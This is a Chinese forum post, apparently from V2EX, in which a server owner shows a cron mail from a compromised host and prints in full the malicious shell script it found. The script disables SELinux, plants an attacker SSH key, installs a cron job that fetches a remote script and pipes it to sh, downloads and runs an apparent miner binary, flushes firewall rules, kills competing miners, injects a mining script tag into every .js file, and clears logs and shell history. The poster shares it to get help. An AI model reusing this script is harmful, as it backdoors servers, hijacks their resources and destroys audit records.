如下的命令
[root@azimiao ~]# systemctl start firewalld.service
You have new mail in /var/spool/mail/root
,然后进去 mail 这个文件夹,然后查看 root 的内容
From root@azimiao.localdomain Tue Nov 27 08:53:28 2018
Return-Path: <root@azimiao.localdomain>
X-Original-To: root
Delivered-To: root@azimiao.localdomain
Received: by azimiao.localdomain (Postfix, from userid 0)
id A091C2409; Tue, 27 Nov 2018 08:53:28 +0800 (CST)
From: "(Cron Daemon)" <root@azimiao.localdomain>
To: root@azimiao.localdomain
Subject: Cron <root@azimiao> url -fsSL xxxxxxxxxxx/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=50357>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127005328.A091C2409@azimiao.localdomain>
Date: Tue, 27 Nov 2018 08:52:06 +0800 (CST)
sh: line 2: dev/null: No such file or directory
mv: cannot stat â<80><98>/usr/bin/wgetâ<80><99>: No such file or directory
mv: cannot stat â<80><98>/usr/bin/curlâ<80><99>: No such file or directory
ok
chattr: No such file or directory while trying to stat REDIS0008ú
chattr: No such file or directory while trying to stat redis-ver^E4.0.2ú
chattr: No such file or directory while trying to stat redis-bitsÀ@ú^EctimeÂTlô[ú^Hused-mem ô^Lú^Nrepl-stream-dbÀÿú^Grepl-id(da32fed1ca9684ea57cb075d10627ec992da4e86ú^Krepl-offsetÀú^Laof-preambleÀþû
chattr: No such file or directory while trying to stat ^Aa^Ab
发现有个脚本,点击能下载,脚本内容如下
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
pkill zjgw
chattr -i /etc/shz.sh
rm -f /etc/shz.sh
chattr -i /tmp/shz.sh
rm -f /tmp/shz.sh
chattr -i /etc/gmbpr
rm -f /etc/gmbpr
else
echo "ok"
fi
if [ -f "$rtdir" ]
then
echo "goto 1" >> /etc/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
fi
mkdir /root/.ssh
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
[[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /etc
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/etc/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /etc/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx > /etc/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
chmod 777 /etc/zigw
chattr +i /etc/zigw
chmod 777 /etc/shz.sh
chattr +i /etc/shz.sh
shdir='/etc/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
fi
sh /etc/shz.sh
fi
else
echo "goto 1" > /tmp/gmbpr2
chattr -i $cont
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
fi
ps -fe|grep zigw |grep -v grep
if [ $? -ne 0 ]
then
cd /tmp
filesize=`ls -l zigw | awk '{ print $5 }'`
file="/tmp/zigw"
if [ -f "$file" ]
then
if [ "$filesize" -ne "1467080" ]
then
chattr -i /tmp/zigw
rm -f zigw
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
fi
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
fi
fi
chmod 777 zigw
sleep 1s
./zigw
else
echo "runing....."
fi
chmod 777 /tmp/zigw
chattr +i /tmp/zigw
chmod 777 /tmp/shz.sh
chattr +i /tmp/shz.sh
shdir='/tmp/shz.sh'
if [ -f "$shdir" ]
then
echo "exists shell"
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/shz.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=10 -P /tmp xxxxxxxxxxm:43768/shz.sh
fi
sh /tmp/shz.sh
fi
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"xxxxxxxxxxxxxxx"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
echo > /var/spool/mail/root
(发贴提示不能使用短网址,莫名其妙的,然后我用 xxx 表示了)
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.